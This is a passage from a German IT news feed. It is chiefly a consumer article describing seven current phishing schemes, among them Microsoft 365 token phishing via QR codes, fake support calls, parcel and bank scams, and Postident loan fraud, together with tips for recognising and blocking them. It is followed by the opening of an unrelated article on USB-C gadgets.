<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a63269712915"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-M365-Phishing-Quelle-Proofpoint.jpg?quality=50&amp;strip=all" alt="Phishing Fallen M365 Phishing Quelle Proofpoint" class="wp-image-3187589" width="1140" height="1082" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Bei diesem Trick übernehmen die Angreifer auch Konten, die mit einem zweiten Faktor geschützt sind. Dafür kombinieren sie die echten Authentifizierungsseiten von Microsoft und Phishing-Webseiten.</p></figcaption></figure><p class="imageCredit">Proofpoint</p></div>



<p>Es handelt sich um echte Microsoft-Meldungen und Webseiten. Allerdings autorisiert das Opfer nicht den Zugang zu seinem eigenen PC oder Smartphone, sondern eine Anwendung der Kriminellen. Diese bekommen nach der Freigabe durch das getäuschte Opfer einen Access-Token. Damit kann die feindliche Anwendung per API auf das Microsoft-Konto zugreifen, ohne dass noch einmal ein Passwort eingegeben werden muss.</p>



<p>Übrigens: Die meisten dieser Angriffe verstecken den Link zur gefälschten Website in einem QR-Code. Dieser entgeht den Spam-Filtern eher als ein üblicher Link, und es lässt die meisten Opfer vom PC auf das Smartphone wechseln. </p>



<p>Auf diesem ist es wegen des kleineren Bildschirms und oft fehlender Sicherheits-Software noch wahrscheinlicher, dass das Opfer die Täuschung nicht bemerkt. <a href="https://tinyurl.com/2xhd6n6d" target="_blank" rel="noreferrer noopener">Eine ausführliche Analyse der Angriffe auf Microsoft-365-Konten haben die Sicherheitsexperten von Proofpoint veröffentlicht</a>.</p>



<h2 class="wp-block-heading">2. Support-Masche: Ihr Computer ist gesperrt &amp; Co.</h2>



<p>Die Support-Masche ist zwar nicht neu, funktioniert aber nach wie vor: Noch immer fallen zahlreiche Menschen auf die perfide Betrugsstrategie herein. Zu den prominenten Opfern zählt Bundestagspräsidentin Julia Klöckner. </p>



<p>Mutmaßlich staatlich organisierte Angreifer kontaktierten sie über den Messenger-Dienst Signal und gaben sich als vermeintliche Signal-Support-Mitarbeiter aus. Unter einem Vorwand forderten sie Klöckner und weitere Politiker auf, ihre PIN einzugeben. Dadurch erlangten die Angreifer Zugriff auf die Signal-Konten der Betroffenen – und damit auf private Chats und Kontakte.</p>



<p>Das Bundesamt für Verfassungsschutz und das Bundesamt für Sicherheit in der Informationstechnik (BSI) haben gemeinsam einen <a href="https://tinyurl.com/yc89cfjd" target="_blank" rel="noreferrer noopener">Leitfaden veröffentlicht</a>, der potenziellen Opfern hilft zu prüfen, ob ihr Signal-Konto übernommen wurde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697134c5"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-MS-Support-Quelle-Bundesnetzagentur.png" alt="Phishing Fallen MS Support Quelle Bundesnetzagentur" class="wp-image-3187588" width="938" height="640" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Phishing mit der Support-Masche. Durch eine vorgetäuschte Windows- oder Defender-Warnung werden Sie zu einem Telefongespräch mit den Angreifern gedrängt.</p></figcaption></figure><p class="imageCredit">Bundesnetzagentur</p></div>



<p>Ebenfalls weiterhin verbreitet sind Angriffe durch angebliche Microsoft-Support-Mitarbeiter. Die Betrüger kontaktieren ihre Opfer per Telefon, E-Mail oder über gefälschte Pop-up-Warnungen im Browser. </p>



<p>Dabei behaupten sie, der Windows-PC habe ein Sicherheitsproblem – etwa sei der Computer gesperrt oder mit Schadsoftware infiziert. Anschließend versuchen sie, die Betroffenen zur Installation einer Fernwartungssoftware oder eines vermeintlichen Sicherheitstools zu bewegen. Tatsächlich erhalten die Angreifer dadurch oft vollständigen Zugriff auf den Rechner.</p>



<h2 class="wp-block-heading">3. Gefälschter Microsoft Defender warnt</h2>



<p>Der Microsoft Defender ist ein Windows-Bordmittel und schützt PCs gegen alle bekannten PC-Viren. Entsprechend alarmierend ist für viele Nutzer eine Warnung dieses Antiviren-Tools. Eine gefälschte Form dieser Warnung erscheint mal per E-Mail, mal als Pop-up im Browser. In diesen Nachrichten wird behauptet, der Schutz des Defenders müsse kostenpflichtig erneuert werden. In der Folge werden die Nutzer auf gefälschte Shop-Webseiten geleitet, die eine Zahlung für einen Virenschutz verlangen.</p>



<p>Grundsätzlich gilt: Der Microsoft Defender ist auf Privat-PCs ein Bordmittel und kostenlos in Windows enthalten. Eine Zahlung ist nicht nötig. Sollte die Warnung per Mail bei Ihnen landen, löschen Sie diese einfach. Schlägt sie als Pop-up im Browser auf, schließen Sie einfach das Browser-Fenster, notfalls mit der Tastenkombination „Alt+F4”. </p>



<p><a href="https://tinyurl.com/yaz82hf3" target="_blank" rel="noreferrer noopener">Der Antivirenspezialist Norton hat eine Anleitung veröffentlicht</a>, die erklärt, wie sich solche Pop-up-Warnungen im Browser beseitigen lassen, falls sie sich im System festgesetzt haben.</p>



<h2 class="wp-block-heading">4. Microsoft-Onedrive: Cloud-Phishing über Freigaben</h2>



<p>Cloud-Dienste wie Onedrive von Microsoft nutzen viele Windows-Nutzer mehrmals täglich. Genau deshalb sind sie ein attraktives Ziel für Phishing. Statt klassischer E-Mails mit Dateianhängen erhalten die Nutzer Freigabe-Benachrichtigungen mit einem Betreff wie „Dokument wurde mit Ihnen geteilt“. Der Inhalt wirkt meist harmlos und oft beruflich relevant: Rechnungen, Projektpläne, Gehaltslisten oder interne Dokumente.</p>



<p>Besonders tückisch ist die Kombination aus echten und gefälschten Elementen. Manche Angriffe nutzen tatsächlich legitime Cloud-Plattformen, bieten dort aber manipulierte Dokumente an. Das Ziel dieser Angriffe sind mehrheitlich die Log-in-Daten der Opfer zu Ihren Cloud- und Mail-Konten. Diese werden dann von den Angreifern übernommen und etwa für neue Phishing-Attacken genutzt.</p>



<h2 class="wp-block-heading">5. Lieferdienste, Lieferdienste und noch mal Lieferdienste</h2>



<p>Phishing im Namen von Paketdiensten gehört zu den stabilsten Angriffsmustern überhaupt und wird gleichzeitig immer ausgefeilter. Der Grund ist die hohe Alltagstauglichkeit: Fast jeder erwartet regelmäßig Lieferungen und ist deshalb kaum misstrauisch, wenn eine Mail, SMS oder Whatsapp zum Thema Paketversand eintrudelt. Moderne Varianten enthalten nicht nur einfache Textlinks, sondern vollständige Tracking-Systeme.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697140c0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Paket-Phishing.png?w=1200" alt="Phishing Fallen Paket Phishing" class="wp-image-3187584" width="1200" height="539" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Hier sehen Sie vier Schritte eines vorgeblichen Lieferdienstes, der Ihnen ein Paket zustellen möchte. In weiteren Schritten sollen Sie Ihr Kundenkonto mit persönlichen Daten vervollständigen und eine Expresslieferung bezahlen.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>



<p>Diese Seiten sind dynamisch aufgebaut und simulieren echte Logistikprozesse. Beim Sendungsverlauf heißt es dann etwa: „Zustellung fehlgeschlagen – bitte Adresse bestätigen“ oder „Letzte Möglichkeit zur Terminänderung“. Besonders kritisch ist die Kombination aus Zeitdruck und Kontext. Wer Opfer eines solchen Angriffs wird, gibt meist seine Log-in-Daten für Shopping- oder Zahlungsdienste preis. Oder er überweist den Angreifern direkt Geld, da angeblich Steuern, Bearbeitungsgebühren oder ein Expresszuschlag fällig sind.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697149f8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Paket-Phishing-Bezahlung.png?w=1200" alt="Phishing Fallen Paket Phishing Bezahlung" class="wp-image-3187585" width="1200" height="645" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine Phishing-Webseite eines vorgeblichen Lieferdienstes, die hier eine Nachzahlung abrechnen möchte, bevor das Paket zugestellt werden kann.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>



<p>Übrigens: Ab dem 1. Juli 2026 gibt es zusätzliche Abgaben auf Sendungen aus Nicht-EU-Ländern. Für Waren unter 150 Euro sind dann pauschal 3 Euro Zollgebühr und eine Einfuhrumsatzsteuer fällig. Einige Kurierdienste verlangen zusätzlich eine Servicepauschale für diese Zollanmeldung. Über die genauen Kosten informiert <a href="https://tinyurl.com/sztfupt4" target="_blank" rel="noreferrer noopener">eine Seite der Verbraucherzentrale NRW</a>. Es lohnt sich, die tatsächlichen Kosten zu kennen, denn es ist wahrscheinlich, dass zu diesem Termin vermehrt Phishing-Mails zu diesem Thema versendet werden.</p>



<h2 class="wp-block-heading">6. Phishing zu Online-Banking gibt es immer</h2>



<p>Phishing zum Online-Banking gibt es fast schon so lange wie das Online-Banking selbst. Die Bedrohungslage ist aber so angespannt wie nie, denn die Angriffe sind nun wirklich zahlreich. <a href="https://tinyurl.com/y58m5smy" target="_blank" rel="noreferrer noopener">Über die neuesten Phishing-Fallen informieren unter anderem die Verbraucherzentralen</a>.</p>



<p>Beispiele aus dem Mai 2026 lauten etwa so: „Bestätigung Ihrer Mobilfunknummer erforderlich“. Absender ist vorgeblich die Easybank. Eine Fälschung von Commerzbank-Mails warnt vor einem fälligen „Photo-TAN Update“, bei dem ein „einmaliger Abgleich der Zugangsdaten“ nötig ist. </p>



<p>Andere Phishing-Mails geben vor, von der Deutschen Bank zu sein, und fordern eine Reaktivierung des „photoTAN-Sicherheitszertifikats“. Auch Kunden der DKB erhielten im Mai Phishing-Mails.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697157e7"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-commerzbank2-Quelle-Verbraucherzentrale.png" alt="Phishing Fallen commerzbank2 Quelle Verbraucherzentrale" class="wp-image-3187583" width="460" height="665" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine aktuelle Phishing-Mail, die auf Kunden der Commerzbank abzielt. Im Text wird ordentlich Druck aufgebaut. Wer nicht reagiert, verliert angeblich „am nächsten Werktag“ den Zugriff auf sein Bankkonto.</p></figcaption></figure><p class="imageCredit">Verbraucherzentrale</p></div>



<p>Sollten Sie eine Mail von Ihrer Bank bekommen, klicken Sie auf keinen Fall auf einen der Links in dieser Mail. Wenn Sie sich unsicher sind, ob Sie reagieren sollen, rufen Sie die Website Ihrer Bank über Ihren Browser auf. </p>



<p>Sollte es tatsächlich ein Anliegen der Bank geben, wird es Ihnen nach dem Einloggen in Ihr Online-Konto angezeigt. Oder Sie rufen Ihre Bank einfach per Telefon an und fragen, ob Informationen von Ihnen benötigt werden.</p>



<h2 class="wp-block-heading">7. Phishing per Post: Kreditbetrug per Postident-Verfahren</h2>



<p>Diese Phishing-Angriffe erreichen Sie per Post in Ihrem echten Briefkasten. Die Briefe geben vor, von Ihrer Bank zu stammen, und fordern Sie auf, Ihre Daten erneut per Postident zu bestätigen. Postident ist ein Verfahren der Post, mit dem Sie Ihre Identität gegenüber anderen, etwa einer neuen Bank oder einem Kreditinstitut, bestätigen können. Wer das beigefügte Schreiben nutzt, legitimiert in der Regel einen hohen Kredit bei einer anderen Bank.</p>



<p>Schäden von 15.000 bis 25.000 Euro sind hier keine Seltenheit. Vorangegangen ist meist ein Diebstahl Ihrer genauen Daten (Postadresse, Hausbank, Arbeitgeber, Verdienst), den die Angreifer dann nutzen. An die Daten kommen die Kriminellen etwa über gefälschte Wohnungsinserate bei Immoscout24 oder ähnlichen Portalen. Wer sich auf eine Wohnung oder ein Haus mit Gehaltszetteln und weiteren Angaben bewirbt, hat bereits alle wichtigen Daten für den Postident-Betrug verraten. Seien Sie beim Postident-Verfahren stets besonders vorsichtig. Konkrete Tipps lesen Sie <a href="https://tinyurl.com/bdbnmxhn" target="_blank" rel="noreferrer noopener">hier</a>.</p>



<h2 class="wp-block-heading">Sicherheitstipps: Phishing erkennen und blockieren</h2>



<p><strong>An diesen Merkmalen erkennen Sie betrügerische Nachrichten:</strong></p>



<ul class="wp-block-list">
<li><strong>Unverlangter Kontakt:</strong> Sie erhalten eine E-Mail, Whatsapp oder SMS über eine Gutschrift, eine Lastschrift oder andere finanzielle Ansprüche, obwohl Sie aktuell keine Buchung storniert oder reklamiert haben.</li>



<li><strong>Zeitdruck:</strong> Die Nachricht suggeriert dringenden Handlungsbedarf und fordert zur schnellen Reaktion auf.</li>



<li><strong>Verdächtige Links:</strong> Die Links in der Nachricht sind hinter einem QR-Code maskiert, führen zu unpassenden Domains oder sind ungewöhnlich lang.</li>



<li><strong>Aufforderung zur Dateneingabe:</strong> Seriöse Unternehmen fordern in Nachrichten oder Mails nur äußerst selten zur Eingabe sensibler Daten auf.</li>



<li><strong>Unpersönliche Anrede:</strong> Oft fehlt die namentliche Ansprache oder es werden generische Formulierungen verwendet.</li>
</ul>



<p><strong>Diese Maßnahmen schützen vor Phishing-Fallen:</strong></p>



<ul class="wp-block-list">
<li><strong>E-Mail, SMS und Whatsapp &amp; Co. sind keine geschlossenen Nachrichtenkanäle:</strong> Sie müssen damit rechnen, auch betrügerische Nachrichten zu erhalten.</li>



<li><strong>Misstrauen Sie Links in Nachrichten:</strong> Klicken Sie keine Links an und scannen Sie keine QR-Codes, wenn Log-in-, Zahlungs- oder Sicherheitsaufforderungen in der Mail stehen. Öffnen Sie den jeweiligen Dienst im Browser über die manuelle Eingabe der Adresse.</li>



<li><strong>Nutzen Sie Browser und Passwortmanager als Frühwarnsystem: </strong>Wenn Ihr <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Passwortmanager</a> Ihre Log-in-Daten auf einer Webseite nicht einfügen möchte, dann ist die Domain vermutlich gefälscht. Achten Sie zudem auf die Warnungen Ihres Browsers.</li>



<li><strong>MFA aktivieren: </strong>Nutzen Sie immer eine Zwei- oder Multifaktor-Authentifizierung, wenn diese angeboten wird. Vor allem <a href="http://www.pcwelt.de/2107907" target="_blank" rel="noreferrer noopener">Passkeys</a> erhöhen die Sicherheit.</li>



<li><strong>Remote-Support misstrauen: </strong>Installieren Sie keine Fernwartungs-Tools, nachdem Sie unaufgefordert kontaktiert wurden.</li>



<li><strong>Freigaben hinterfragen: </strong>Wenn Sie Freigaben für Dateien in Cloud-Speichern erhalten, kontaktieren Sie zunächst den Absender, idealerweise telefonisch.</li>
</ul>



<p>Infos zu aktuellen Angriffen: Informieren Sie sich über Phishing-Kampagnen etwa bei der <a href="https://tinyurl.com/y58m5smy" target="_blank" rel="noreferrer noopener">Verbraucherzentrale NRW</a>.</p>



<p><strong>Als letzte Verteidigungslinie lassen sich Antivirenprogramme, Browserschutz und Spezial-Tools einsetzen:</strong></p>



<ul class="wp-block-list">
<li><strong>Antivirus:</strong> Große Sicherheits-Suiten wie <a href="https://www.awin1.com/cread.php?awinmid=14693&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=http://www.gdata.de" target="_blank" rel="noreferrer noopener">G Data Internet Security</a> filtern Phishing-Mails heraus, bevor sie diese Nachrichten öffnen.</li>



<li><strong>Browser-Schutz: </strong>Browser von Sicherheitsanbietern blockieren viele aktuelle Phishing-Seiten, etwa der <a href="https://neobrowser.ai/" target="_blank" rel="noreferrer noopener">KI-Browser Norton Neo</a>.</li>



<li><strong>Spezial-Tools:</strong> KI-Chatbots wie <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11660&amp;clickref=rss&amp;ued=http://www.bitdefender.com/de-de/consumer/scamio" target="_blank" rel="noreferrer noopener">Scamio von Bitdefender</a> begutachten verdächtige Nachrichten und warnen vor gefährlichen Inhalten.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a63269717055"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Verdaechtige-Website-blockiert-Neo.png?w=1200" alt="Phishing Fallen Verdaechtige Website blockiert Neo" class="wp-image-3187587" width="1200" height="645" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Einen guten Phishing-Schutz erhalten Sie beispielsweise über Browser von Sicherheitsanbietern wie hier dem Browser Norton Neo.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[13 clevere USB-C-Gadgets, die viel mehr können, als nur Ihr Handy aufzuladen]]></title>
<description><![CDATA[Ich weiß nicht, wie es in Ihren Schubladen aussieht, aber meine sind voll mit Kabeln, die ich wahrscheinlich nie wieder benutzen werde, weil die Technologie sich ziemlich weiterentwickelt hat. Zum Glück scheint sich USB-C durchzusetzen, denn es gibt keinen falschen Weg, diese Dinger anzuschließen...]]></description>
<link>https://tsecurity.de/de/3690951/it-nachrichten/13-clevere-usb-c-gadgets-die-viel-mehr-koennen-als-nur-ihr-handy-aufzuladen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690951/it-nachrichten/13-clevere-usb-c-gadgets-die-viel-mehr-koennen-als-nur-ihr-handy-aufzuladen/</guid>
<pubDate>Fri, 24 Jul 2026 10:03:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ich weiß nicht, wie es in Ihren Schubladen aussieht, aber meine sind voll mit Kabeln, die ich wahrscheinlich nie wieder benutzen werde, weil die Technologie sich ziemlich weiterentwickelt hat. Zum Glück scheint sich USB-C durchzusetzen, denn es gibt keinen falschen Weg, diese Dinger anzuschließen. Aber nicht nur Smartphones, Tablets und Laptops verwenden diese Anschlüsse, sondern auch eine lange Liste von Gadgets.</p>



<p>Wir haben den Markt nach versteckten Perlen durchforstet: Gadgets, bei denen Sie denken werden: “Wow, ich wusste gar nicht, dass ich das brauche, aber es wird mein Leben so viel einfacher machen!” Schauen wir uns also an, mit welchen coolen Geräten Sie Ihre Typ-C-Kabel und -Anschlüsse nutzen können.</p>



<h2 class="wp-block-heading">heat it Insektenstichheiler</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b7d445"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/06/PC-Welt-Aufmacher-57.jpg?quality=50&amp;strip=all" alt="heat it - Insektenstichheiler für dein Smartphone - Chemiefreie Behandlung von Juckreiz &amp; Schmerz mit konzentrierter Wärme - für Android mit USB-C (nicht für iPhone 15 geeignet) Amazon Angebot" class="wp-image-2376376" width="1200" height="800" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PCWelt/heat it/Amazon</p></div>



<p>Wer im Sommer oder Urlaub oft von Mücken geradezu heimgesucht wird, wird sich besonders über dieses geniale Gadget freuen: Dieses winzige Gerät, das sich einfach per USB-C mit Ihrem Smartphone verbinden lässt, kann mit gezielter Wärme den Juckreiz von Stichen und Insektenbissen deutlich reduzieren.</p>



<p>Ähnlich wie größere Varianten, etwa diesen hier <a href="https://www.pcwelt.de/article/2420282/beurer-insektenstichheiler-br-90-im-test-rasche-hilfe-gegen-juckreiz.html" target="_blank" rel="noreferrer noopener">von Beurer</a>, muss man den kleinen <a href="https://www.amazon.de/dp/B0D26GWWD1?th=1&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Stichheiler von heat it</a> einfach nur per App aufladen und dann auf den Stich halten. Die Hitze erledigt dann den Rest und zersetzt die Proteine, die im Mückenstich dafür sorgen, dass die Stelle anschwillt, juckt und schmerzt. Ein echtes Must-have für den Sommer, und es kostet nicht mal 25 Euro.</p>



<h2 class="wp-block-heading">Mini-Ventilator</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a631c2b7e317"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/KIMMOO-3-in-1-Turbo-Handventilator.jpg?quality=50&amp;strip=all" alt="KIMMOO 3-in-1 Turbo-Handventilator" class="wp-image-3198532" width="1048" height="916" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">KIMMOO / Amazon / PC-WELT</p></div>



<p>Ziemlich genial sind auch diese kleinen Ventilatoren, die man im Sommer einfach in der Hosentasche mitnehmen und bei Bedarf schnell einsetzen kann. Wer schon einmal bei 30 Grad in einer vollen S-Bahn saß und sich zumindest ein wenig frische Luft gewünscht hat, der wird dieses Gadget lieben.</p>



